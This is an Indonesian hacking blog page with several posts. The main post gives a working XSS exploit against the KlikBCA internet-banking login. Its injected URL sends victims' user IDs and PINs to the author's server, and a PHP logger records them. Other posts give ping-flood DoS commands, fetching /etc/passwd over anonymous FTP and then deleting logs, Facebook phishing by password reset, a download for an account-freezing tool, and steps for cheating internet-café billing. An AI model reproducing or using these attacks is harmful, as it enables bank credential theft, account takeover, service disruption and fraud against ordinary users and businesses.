jump to navigation

Download majalah hacking x-code megazine yogyafree Juni 22, 2010

Posted by whiray in Hacker.
1 comment so far

Mendengar kata hacking atau hacker, fikiran kita langsung terbayang-bayang terhadap kejahatan dunia maya, pembobolan bank, pembobolan sistem pertahanan (security) atau bypass software dari yang bayar menjadi gratis dan lain-lain. tapi benarkah yang begitu disebut hacker? anda akan temukan jawabannya dengan membaca majalah haking x-code megazine buatan komunitas yogyafree . sebenarnya sudah dari dulu saya ingin berbagi informasi tentang komunitas dan majalah hacking satu ini, mungkin dengan membaca majalah elektronik /e-zine x-code megazine ini anda bisa sedikit mengetahui bagaimana cara hacking software, mendapatkan password windows dan banyak lagi yang dibahas di x-code megazine ini. sampai tulisan ini dibuat majalah x-code megazine ini sudah sampai di edisi ke 13. Anda bisa langsung mendownload dan mencoba program-program dan trik-trik membobol password dari majalah ini.

  1. X-CODE MEGAZINE EDISI 1
    Download
  2. X-CODE MEGAZINE EDISI 2
    Download
  3. X-CODE MEGAZINE EDISI 3
    Download
  4. X-CODE MEGAZINE EDISI 4
    Download
  5. X-CODE MEGAZINE EDISI 5
    Download
  6. X-CODE MEGAZINE EDISI 6
    Download
  7. X-CODE MEGAZINE EDISI 7
    Download
  8. X-CODE MEGAZINE EDISI 8
    Download
  9. X-CODE MEGAZINE EDISI 9
    Download
  10. X-CODE MEGAZINE EDISI 10
    Download
  11. X-CODE MEGAZINE EDISI 11
    Download
  12. X-CODE MEGAZINE EDISI 12
    Download
  13. X-CODE MEGAZINE EDISI 13
    Download

14. X-CODE MEGAZINE EDISI 14
Download

Jadikan majalah ini hanya untuk pembelajaran. jangan untuk melakukan kejahatan. Semoga membantu

Iklan

Security KlikBCA-Recover Password With XSS Juni 5, 2009

Posted by whiray in Hacker, Internet.
1 comment so far

Sudah baca majalah Underground Info ? Di majalah itu ada artikel yang ditulis oleh S’to tentang XSS di halaman login klikbca.com. Dalam tulisan ini saya bahas lebih jauh lagi dan saya berikan contoh exploit yang cukup berbahaya dari vulnerability yang ditemukan S’to di majalah tersebut.
Maaf artikel ini bukan XSS basics, tentang apa itu XSS nanti saya akan bahas di artikel khusus.

Sebenarnya XSS termasuk bug yang gawat dan susah diantisipasi, namun XSS juga bug yang paling sering diremehkan. Karena berbeda dengan bug lain seperti SQL Injection yang menyerang server, bug ini tidak berpengaruh sama sekali terhadap server. XSS hanya menyerang client, yaitu pengguna web application.

Mungkin mereka berpikir apa sih hal terburuk yang bisa menimpa server dengan XSS? Memang tidak secara langsung, namun ingat satu bug bisa di-exploit dengan 1001 macam cara yang semakin lama semakin efektif. Anda akan terkejut menyadari bahwa bug “seremeh” ini ternyata bisa diexploit sedemikian rupa.

The Vulnerability

xss bug

Bug XSS ini akan muncul bila kita memasukkan username dan password yang salah. Ketika kita salah mengisi password, maka akan muncul dialog box yang memberitahu bahwa password kita salah.

URL ketika password kita salah adalah:

https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=Mohon masukkan User ID/Password Anda yg benar \n (Please enter Your correct User ID/Password)

URL tersebut akan menghasilkan source html sebagai berikut:
<script>
var err=‘User ID harus Alpha Numerik/User ID must be Alpha Numeric’
alert(err);
iBankForm.action=‘login.jsp’;
iBankForm.submit();
</script>

Perhatikan bahwa setelah var err ditutup dengan karakter kutip (’). Jadi kalau kita ingin meng-injeksikan tag html atau javascript lain, kita harus tutup dulu dengan karakter (’). Mari kita coba untuk menampilkan dialog box berisi cookie dengan URL berikut:

https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=TEST‘;alert(document.cookie);<!–
URL di atas menghasilkan source html berikut:

1
2
3
4
5
6
<script type=“text/javascript”>
var err=‘TEST’;alert(document.cookie);<!–
alert(err);
iBankForm.action=’
login.jsp‘;
iBankForm.submit();
</script>

Proses injeksi tersebut bisa dijelaskan dalam gambar berikut ini (klik gambar untuk lebih detil):

klikbca3

Oke saya rasa cukup main-mainnya, saya tidak terlalu suka cookie, saya ingin lebih dari itu, saya ingin username dan password.

Strategy and Tactics

Strategi yang saya pakai untuk mendapatkan username dan password sangatlah sederhana, yaitu dengan mengirimkan password dan username pada saat user meng-klik tombol submit. Untuk bisa menjalankan strategi itu saya menggunakan taktik berikut:

  1. Meng-intercept klik tombol submit
  2. Mengirimkan user dan password ke server saya
  3. Mencatat user dan password di server saya

Intercepting Submit Button

Saya menemukan kendala dalam mengintercept submit button. Kalau kita lihat pada source htmlnya button submit, kita akan temukan bahwa event onclick sudah di-hook untuk fungsi Login_Form_Validator. Setelah saya coba-coba, saya tidak bisa mengubah onclick itu ke fungsi lain.

1
2
3
<input type=“Submit” value=“LOGIN” name=“value(Submit)”
onclick=“javascript:return Login_Form_Validator(document.frmParam)”
onmouseover=“this.style.cursor=’hand’” />

Fungsi Login_Form_Validator digunakan untuk melakukan validasi awal apakah kita mengisi user dan password sesuai format yang benar.

var blnSubmitted = false;
function Login_Form_Validator( theForm ) {document.forms[0][‘value(user_id)’].autocomplete = ‘off’;
document.forms[0][‘value(pswd)’].autocomplete = ‘off’;

var blnResponse = false;
if (blnSubmitted) {
return false;
}

var strErrMsg = “”;
if( document.forms[0][‘value(user_id)’].value == ) {
alert(“Silakan mengisi User ID anda/Please input your User ID”);
document.forms[0][‘value(user_id)’].focus();
return false;
}
if( document.forms[0][‘value(user_id)’].value.length>12) {
alert(“User ID/Password Anda salah / Your User ID/Password is Wrong”);
document.forms[0][‘value(user_id)’].select();
document.forms[0][‘value(user_id)’].focus();
return false;
}

if(document.forms[0][‘value(pswd)’].value == ) {
alert(“Silakan mengisi PIN anda/Please input your PIN”);
document.forms[0][‘value(pswd)’].focus();
return false;
}
if(document.forms[0][‘value(pswd)’].value.length<6) {
alert(“PIN harus 6 Angka/PIN must be 6 digits”);
document.forms[0][‘value(pswd)’].focus();
return false;
}

//if(strErrMsg != ”) {
// alert(strErrMsg);
// return false;
//}

//blnSubmitted = confirm(”Click OK to login.”);
if ( !blnSubmitted ) {
blnSubmitted = true;
blnResponse = true;
}

//if(’< %= blnLogout %>’==’true’)
//blnResponse = false;

return blnResponse;
}

Saya berpikir, bila mengubah onclick button ke fungsi lain tidak bisa, berarti kita harus menimpa fungsi Login_Form_Validator dengan fungsi kita sendiri. Biarkan event onclick button submit mengarah pada Login_Form_Validator, namun fungsi tersebut sudah kita ubah dengan code kita sendiri. Dengan kata lain kita define fungsi dengan nama yang sama, namun isi yang berbeda. Apakah itu akan menimbulkan dualisme fungsi? Iya tentu saja, karena satu fungsi yang sama tidak boleh di-definisikan dua kali.

Setelah saya perhatikan source htmlnya, ternyata saya diuntungkan dengan posisi fungsi Login_Form_Validator yang berada di baris paling bawah. Jadi yang saya lakukan adalah saya definisikan fungsi dengan nama Login_Form_Validator, dan kemudian saya buat browser untuk mengabaikan semua javascript di baris selanjutnya. Dengan cara ini fungsi Login_Form_Validator yang dikenal browser adalah Login_Form_Validator versi saya. Untuk itu saya tambahkan tag <noscript> dan tag awal komentar <! agar javascript pada baris sesudahnya diabaikan browser.

Jadi URL untuk menjalankan taktik saya di atas adalah:

https://ibank.klikbca.com/authentication.do?value(actions)=login&value(strError)=TEST‘;function Login_Form_Validator(theForm){alert(’TEST’);return false;}</script><noscript><!–

URL tersebut menghasilkan source html berikut:

<script>
var err=‘TEST’;function Login_Form_Validator(theForm){alert(‘TEST’);return false;}</script><noscript><!–
alert(err);
iBankForm.action=’
login.jsp‘;
iBankForm.submit();
</script>

function overridden

Untuk menguji versi Login_Form_Validator manakah yang dipakai, klik tombol LOGIN tanpa mengisi username dan password. Ternyata yang muncul adalah dialog box “TEST”. Itu berarti fungsi yang berlaku adalah versi saya, HORE! Kalau versi aslinya, muncul peringatan bahwa user dan password harus diisi. Oke taktik pertama sukses. Mari kita Lanjut ke taktik ke-2.

Sending username and password

Oke, sekarang ketika user mengklik submit, code kita akan di-eksekusi. Now what? Selanjutnya tentu saja kita harus membuat code untuk mengirimkan user dan password pada saat user mengklik tombol submit. Untuk bisa mengirimkan data, berarti kita harus membuat browser melakukan request ke server saya. Saya menggunakan image untuk tujuan itu. Lho kok image? Iya karena ketika browser menemukan tag image, saat itu juga browser akan melakukan request GET ke server tempat image itu berada sesuai isi atribut SRC. Namun hal yang lebih penting lagi adalah, bila kita ubah atribut src dari object image dengan javascript, maka browser akan mengirimkan request GET sekali lagi. Request ini yang lebih penting, bukan request GET image pertama ketika halaman diload.

Saya definisikan tag image dengan dimensi 1×1 agar invisible, dengan nama myimage sebagai berikut:

<img src=http://www.ilmuhacking.com/testcapture.php name=“myimage” width=“1″ height=“1″>

Sedangkan variabel yang berisi username dan password adalah:

document.forms[0][‘value(user_id)’].value
document.forms[0][‘value(pswd)’].value

Agar bisa mengirimkan user dan password, saya harus mengubah atribut src myimage menjadi:

'http://www.ilmuhacking.com/testcapture.php?userid=‘+document.forms[0]['value(user_id)'].value+’&passwd=’+document.forms[0]['value(pswd)'].value

Selanjutnya saya harus membuat fungsi Login_Form_Validator mengubah atribut src myimage, agar ketika submit button di-klik maka atribut src myimage akan berubah dan browser akan melakukan request GET ke isi atribut src. Hal yang tricky adalah jika return dari fungsi Login_Form_Validator adalah false, browser baru akan melakukan request image. Bila tidak, browser akan mengabaikan perubahan atribut src, dan tetap melakukan submit.

Untuk menyiasatinya, saya terpaksa membuat agar button submit harus di klik 2x. Pada klik yang pertama tidak terjadi submit sesungguhnya, hal ini saya manfaatkan untuk mengubah atribut src myimage dan mengirim username/password ke server saya. Pada klik ke-2, browser baru melakukan submit yang sesungguhnya. Agak aneh memang, tapi saya yakin kebanyakan user tidak akan menyadari dan akan melanjutkan dengan meng-klik sekali lagi.

Saya buat satu variabel abc yang bernilai false pertama kali. Pada klik pertama, nilai abc menjadi true, sehingga pada klik ke-2 fungsi tidak mengembalikan nilai false. Fungsi Login_Form_Validator adalah sebagai berikut:

var abc=false;
function Login_Form_Validator(theForm {
if (!abc) {
document.images.myimage.src=http://www.ilmuhacking.com/testcapture.php+‘?userid=’+document.forms[0][‘value(user_id)’].value+‘&passwd=’+document.forms[0][‘value(pswd)’].value;
abc = true;
return false;
}
}

Kini sudah lengkap semua yang dibutuhkan, siap untuk diinjeksikan melalui URL sebagai berikut:

https://ibank.klikbca.com/authentication.do?value(actions)=login&value(strError)=TEST‘;var abc=false;function Login_Form_Validator(theForm){if (!abc) {abc=true;document.images.myimage.src=’http://www.ilmuhacking.com/testcapture.php?userid=‘%2Bdocument.forms[0]['value(user_id)'].value%2B’%26passwd=’%2Bdocument.forms[0]['value(pswd)'].value;return false;}}</script><img name=”myimage” src=”http://www.ilmuhacking.com/testcapture.php” width=”1″ height=”1″><noscript><!–

URL di atas adalah EXPLOIT. Tugas attacker adalah membuat orang lain yang ingin login, meng-klik melalui link tersebut. Ada banyak cara untuk itu. Salah satunya adalah dengan membuat link dengan anchor text di samarkan, seperti ini:

Klik di sini untuk login.

Bila kita coba isi dengan username:abc1234 dan password:123456. Maka pada klik pertama akan ada request GET ke URL berikut ini:

http://www.ilmuhacking.com/testcapture.php?userid=abc1234&passwd=123456

Baru pada klik ke-2, username dan password tersebut di-submit dengan request POST ke server yang benar.

Saving User and Password

Sekarang bagian yang paling mudah, yaitu menyimpan username dan password yang masuk. Dalam contoh ini saya gunakan URL www.ilmuhacking.com/testcapture.php

Saya menyimpan user dan password dalam file capture.txt. Kode PHP yang saya gunakan untuk menyimpan user dan password adalah sebagai berikut:

1
2
3
4
5
6
7
8
9
10
11
<?php
$file=fopen(“capture.txt”,“a+”);
$userid=$_GET[“userid”];
$passwd=$_GET[“passwd”];
$ipaddr=$_SERVER[“REMOTE_ADDR”];
$now = date(“Ymd H:i:s”);
if (!empty($userid)) {
fwrite($file,$userid =&amp;gt; $passwd (at $now from $ipaddr)\n);
}
fclose($file);
?>

Kesimpulan

Ternyata bug yang di-remehkan seperti XSS sekalipun, bila di-exploit bisa jadi berbahaya. Saya telah buktikan dengan contoh sederhana ini. Di tangan orang yang tepat celah sekecil apapun bisa menjadi masalah besar. Pesan saya: Never Underestimate Vulnerabilities

Penggunaan enkripsi https sama sekali tidak berguna dalam kasus ini. Karena https hanya menjamin authentication dan confidentiality saja.

Hacking Menggunakan DOS Juni 4, 2009

Posted by whiray in Hacker.
1 comment so far

Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat

OK, inilah keterangannya.

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik ‘/?’ setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue – type Control-Break;
To stop – type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don’t Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.

Pinging chintan [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

************
Newbie tip: ‘localhost’ adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********

Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping http://www.yahoo.com”

Pinging http://www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms

Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.

Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.

***********
Newbie tip: ‘Dos’ yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.

2. Tracert

Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik “tracert http://www.yahoo.com” pada dos prompt maka akan terdapat:

Tracing route to http://www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * http://www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]
Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka http://www.yahoo.com dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.

Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.

3. Telnet

Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.

***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services” pada notepad.
***********
Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org” maka seperti gambar dibawah inilah yang saya dapatkan.

Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.

Well, http://www.cyberspace.org memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.

4. FTP

FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:

! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:

1. ‘pwd’ to know the present directory at remote machine.
contohnya. ftp>pwd
/etc/home
2. ‘lcd’ to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. ‘cd’ to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. ‘mput’ to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. ‘mget’ to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. ‘open’ to establish a connection with remote host.
contohnya. ftp>open http://www.target.com
7. ‘bye’ closes the connection and quits from ftp

Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.

5. netstat

Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan http://www.target.com pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.

Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.

Sebagai contoh jika saya membuka http://www.yahoo.com maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:

“TCP 203.43.50.81:2034 http://www.yahoo.com:80 ESTABLISHED”

Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80

*************
Newbie tip: Dengna cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.

Hacking Facebook dengan E-mail palsu Juni 4, 2009

Posted by whiray in Hacker.
2 comments

Banyak cara untuk mencuri username/email dan password untuk login akun facebook. Diantaranya dengan cara berikut ;

  1. Buat email palsu dengan domain yang meyakinkan dan bukan gratisan seperti yahoomail dan googlemail. (Contoh nyata ; ****@backd00red.org)
  2. Cari email target, kita dapat mencari daftar email melaui banyak cara, dan yang paling amatir adalah lewat google atau untuk percobaan, pakai saja email teman kamu.
  3. Setelah mendapatkan email yang terdaftar di facebook, buka halaman lgin facebook.
  4. Pilih link forget password, reset password, atau change email address, atau yang sejenis.
  5. Kirimkan pada email target. Usahakan email tersebut mirip dan disertai dengan signature / tertanda team facebook. Contohnya ;
    screenshot email di atas adalah contoh nyata yang pernah berhasil menipu seseorang pemilik alamat blog wilson-the prayer. silahkan baca pengalaman pak wilson dengan facebook nya tersebut.
  6. Lanjut, Email di atas menawarkan konfirmasi asosiasi (hubungan) akun dengan email yang kita miliki. Jika target menerima dan mengikuti link yang kita berikan di atas. Maka password lama atau baru akan dikirim ke email kita, bukan lagi pada email si pemilik asli alias target.
  7. Done. Kita mendapatkan passwordnya.

Artikel ini sengaja ditulis singkat dan tidak begitu detail, karena hanya untuk tujuan menjelaskan bagaimana hacker bekerja untuk mencuri password kamu. Jawaban atas bagaimana pencegahan hal ini terjadi pada facebook kamu adalah, jangan mudah percaya dengan e-mail, message, dan hal-hal lain yang berhubungan dengan privasi kamu di facebook. Waspadalah karena bahaya atau tidaknya aktifitas hacker itu tergantung pada niat hacker itu sendiri, bukan apa yang hacker dapatkan dari info yg dicuri. Sekecil apapun info yang didapat, itu dapat membuka lubang lebih besar untuk mengganggu keamanan kita dalam dunia maya, yang tentu saja mengancam kehidupan nyata kita.

Cara Hacking Facebook Juni 4, 2009

Posted by whiray in Hacker.
11 comments

facebook-small-logoAwas!! Facebook kamu di hack. Sekarang ada program namanya GZ’s Facebook. Cara kerjanya cukup simple, kita tinggal ketikan e-mail dari akun si yang punya facebook, kemudian klik Freeze. Nah ditunggu beberapa saat.. Hasilnya, password si yang punya facebook akan berubah, dan dia tidak bisa kembali masuk ke dalam facebook-nya!!

Gimana?? Kacaukan kalo sampe facebook kita ter-freeze macam gini. Hari gini akun facebook ilang?? Duh, berat banget jaman sekarang ga akses facebook.  Soalnya, kalo hari ini ga buka facebook serasa mau mati?? He..he..

Tapi mungkin ada sisi positif nya juga loh ney program. Kalo mau coba, silahkan di unduh disini. Praktekin aja ke akun mu sendiri, trus liat seberapa uring-uringan diri kamu tanpa facebook. Dari situ kita bisa melihat seberapa addicted diri kita terhadap facebook.

Aku sendiri sampe saat ini belum tahu betul bagaimana cara mengatasi masalah freeze ini, namun cara yang cukup aman, kita juga harus merahasiakan e-mail yang menjadi username kita. Dengan menyembunyikan informasi e-mail tersebut, setidaknya selangkah lebih maju dalam menghindari bahaya korban dari keisengan orang atas akun facebook kita.

Nah, kalo berminat mencoba programnya, ada disini. Dan ingat, secara pribadi aku tidak bertanggung jawab atas segala hal yang diakibatkan dari program tersebut. Semua menjadi tanggung jawab Anda sebagai pemakai. Maka gunakanlah dengan bijaksana..

Cara Menghack Billing Warnet Juni 4, 2009

Posted by whiray in Hacker.
3 comments


cara menghack Billing warnet

Juni 4, 2009 <!–rhan16–>

ahan2 harus disiapkan:

1. Program ZHider. download diSini
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
